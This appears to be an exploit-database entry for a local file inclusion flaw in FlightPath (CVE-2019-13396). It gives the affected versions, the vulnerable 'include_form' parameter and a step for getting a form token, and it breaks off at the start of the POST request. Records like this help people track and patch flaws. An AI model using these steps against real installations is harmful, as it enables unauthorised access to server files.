Exploits / Vulnerability Discovered : 2019-07-15 |
Type : webapps |
Platform : php
This exploit / vulnerability Flightpath < 4.8.2 / < 5.0rc2 local file inclusion is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: FlightPath < 4.8.2 & < 5.0-rc2 - Local File Inclusion
# Date: 07-07-2019
# Exploit Author: Mohammed Althibyani
# Vendor Homepage: http://getflightpath.com
# Software Link: http://getflightpath.com/project/9/releases
# Version: < 4.8.2 & < 5.0-rc2
# Tested on: Kali Linux
# CVE : CVE-2019-13396
# Parameters : include_form
# POST Method:
use the login form to get right form_token [ you can use wrong user/pass ]
This is how to POST looks like:
POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1